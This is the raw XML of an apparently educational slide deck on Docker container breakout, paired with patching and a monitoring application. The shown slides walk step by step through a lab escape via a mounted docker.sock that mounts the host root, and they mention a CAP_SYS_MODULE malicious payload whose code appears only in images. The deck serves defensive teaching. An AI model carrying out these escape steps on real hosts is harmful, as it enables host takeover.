                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>CVE-2019-13139 - Docker build code execution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>CVE-2024-21626 - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" err="1"/>
              <a:t>runC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t> Escape Vulnerability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-SA" sz="2400"/>
              <a:t>Security Application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Courier New" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>Patching</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>Docker socket misconfigurations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>Privilege escalation using Volume Mount</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>Container escape using the exposed socket</a:t>
            </a:r>
            <a:endParaRPr lang="en-SA" sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Container attack using privileged flag</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>CVE-2019-13139 - Docker build code execution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>CVE-2024-21626 - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" err="1"/>
              <a:t>runC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t> Escape Vulnerability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Courier New" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>Monitoring</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>Security Monitoring Application: Key Ideas</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>Security Monitoring Application: Architecture Overview</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>Examples of Analyzing Breakout Vulnerabilities</a:t>
            </a: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2</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2622284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2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>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t>Container escape using the exposed socket</a:t>
            </a:r>
            <a:endParaRPr lang="en-SA" sz="3200"/>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20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="186321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1: Create a flag file in root to verify the container escape</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800">
              <a:effectLst/>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21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20490" name="Picture 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{074663EB-C9EB-EA43-F5CE-7C1607F83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325632"/>
            <a:ext cx="792480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291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2: Simulate an attacker by spinning up a container with docker sock mounted and obtain a shell to start attack</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200">
              <a:effectLst/>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22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="22530" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA3B217A-DF4C-B4BA-46A1-D25553863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06700"/>
            <a:ext cx="7924800" cy="622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363242-1450-F8F6-0243-B9AA000E90F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="3833485"/>
            <a:ext cx="9766738" cy="369332"/>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Step 3: Check if the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>docker.sock</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> is mounted by listing /var/run/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>docker.sock</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="22532" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F87E10D6-D456-0C08-4176-A77B7DB7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410075"/>
            <a:ext cx="7924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293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4: Install Docker CLI in this container to use the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>docker.sock</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200">
              <a:effectLst/>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23</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23554" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3A60072-D1D0-7F3D-4B05-504D32F0B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73951"/>
            <a:ext cx="792480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0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Step 5: Now using this Docker client and the docker socket mounted onto the container, we can simply spin up another container on the host and mount the root directory of the host machine onto the newly started container.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200">
              <a:effectLst/>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24</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="24578" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{190BFA7D-EDB6-45F8-4D7F-9D46E89FF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073400"/>
            <a:ext cx="7924800" cy="711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1AF1AE-9E04-EEE5-C97A-885F8F155AA0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="4044211"/>
            <a:ext cx="9997966" cy="646331"/>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Step 6: After executing step 5 the next shell will be the shell of new container created inside the container.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8081DCCC-BCA2-58AF-B033-BD4E3AE86BC1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="5200281"/>
            <a:ext cx="10208172" cy="646331"/>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Step 7: Navigate to mounted /test/root and the container escape will occur, and the flag can be accessed</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3553289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25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="25602" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A58F999B-4D29-6C8E-0282-ED9B84842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9744"/>
            <a:ext cx="79248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1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marL="285750" lvl="2" indent="-285750"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400"/>
              <a:t>Container escape using the exposed socket</a:t>
            </a:r>
            <a:endParaRPr lang="en-SA"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indent="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200">
              <a:effectLst/>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26</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="27650" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C14F7CC4-4FF5-FAF9-50DF-F309A332D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041650"/>
            <a:ext cx="7924800" cy="77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51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2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>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27</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="360904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r>
              <a:rPr lang="en-US" sz="3200" u="sng"/>
              <a:t>Vulnerability exploited:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200"/>
              <a:t> In this attack, a process with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" err="1"/>
              <a:t>CAP_SYS_Module</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200"/>
              <a:t> capability is exploited to execute a malicious code.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" u="sng"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" sz="3200"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3200">
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3200">
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3200"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200"/>
              <a:t>A container is created with the capability given by default.</a:t>
            </a:r>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28</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="A black background with white text&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6CAA8B73-5ED6-8518-5C64-F90D463E188A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2138363" y="3751729"/>
            <a:ext cx="7915275" cy="1371600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="121960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0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200"/>
              <a:t>Preparation of the attack:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3200"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>A malicious payload </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200">
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Creation.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200">
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3200">
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3200">
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3200">
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3200">
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>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29</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="A screenshot of a computer program&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3586D64-D94D-1E02-F116-E5F78985DABD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5696231" y="1385887"/>
            <a:ext cx="5819775" cy="5229225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="268868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a:xfrm>
            <a:off x="838200" y="197037"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-SA"/>
              <a:t>Outline</a:t>
            </a:r>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838200" y="1248352"/>
            <a:ext cx="10515600" cy="4855602"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t">
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-SA" sz="2400"/>
              <a:t>Introduction</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-SA" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Container </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Breakout</a:t>
            </a:r>
            <a:endParaRPr lang="en-SA" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg2">
                  <a:lumMod val="90000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Courier New" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-SA" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Examples: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Docker socket misconfigurations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Privilege escalation using Volume Mount</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Container escape using the exposed socket</a:t>
            </a:r>
            <a:endParaRPr lang="en-SA" sz="1600">
              <a:solidFill>
                <a:schemeClr val="bg2">
                  <a:lumMod val="90000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Container attack using privileged flag</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>CVE-2019-13139 - Docker build code execution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>CVE-2024-21626 - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>runC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> Escape Vulnerability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-SA" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Security Application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Courier New" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Patching</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Docker socket misconfigurations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Privilege escalation using Volume Mount</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Container escape using the exposed socket</a:t>
            </a:r>
            <a:endParaRPr lang="en-SA" sz="1600">
              <a:solidFill>
                <a:schemeClr val="bg2">
                  <a:lumMod val="90000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Container attack using privileged flag</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>CVE-2019-13139 - Docker build code execution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Wingdings" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>CVE-2024-21626 - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>runC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> Escape Vulnerability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Courier New" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
